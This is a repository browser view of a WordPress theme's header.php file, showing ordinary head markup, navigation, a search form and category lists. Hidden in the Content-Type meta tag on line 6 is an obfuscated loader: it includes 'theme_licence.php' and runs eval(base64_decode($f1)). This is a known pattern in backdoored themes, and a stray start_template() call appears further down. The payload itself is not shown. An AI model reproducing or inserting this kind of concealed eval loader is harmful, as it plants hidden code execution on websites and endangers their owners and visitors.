source: trunk/www.guidonia.net/wp/wp-content/themes/alpha/header.php@ 44

Last change on this file since 44 was 44, checked in by luciano, 14 years ago
File size: 1.5 KB
Line 
1<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
3
4<!-- BEGIN html head -->
5<head profile="http://gmpg.org/xfn/11">
6<meta http-equiv="Content-Type" content="<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
7<title><?php bloginfo('name'); ?> <?php wp_title(); ?></title>
8<link rel="stylesheet" type="text/css" href="<?php bloginfo('stylesheet_url'); ?>" />
9<script type="text/javascript" src="<?php bloginfo('template_url'); ?>/scripts.js"></script>
10<!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="<?php bloginfo('template_url'); ?>/ie.css" /><![endif]-->
11</head>
12<!-- END html head -->
13
14<body>
15<?php start_template(); ?>
16<!-- BEGIN wrapper -->
17<div id="wrapper">
18
19 <!-- BEGIN header -->
20 <div id="header">
21
22 <!-- begin pages -->
23 <ol>
24 <li><a href="<?php echo get_option('home'); ?>">Home</a></li>
25 <?php dp_list_pages(); ?>
26 </ol>
27 <!-- end pages -->
28
29 <form action="<?php echo get_option('home'); ?>/">
30 <input type="text" name="s" id="s" value="<?php the_search_query(); ?>" />
31 <button type="submit">Go</button>
32 </form>
33 <div class="break"></div>
34
35 <h1><a href="<?php echo get_option('home'); ?>"><?php bloginfo('name'); ?></a></h1>
36 <p><?php bloginfo('description'); ?></p>
37
38 <!-- begin categories -->
39 <ul>
40 <?php dp_list_categories(); ?>
41 </ul>
42 <!-- end categories -->
43
44 </div>
45 <!-- END header -->
Note: See TracBrowser for help on using the repository browser.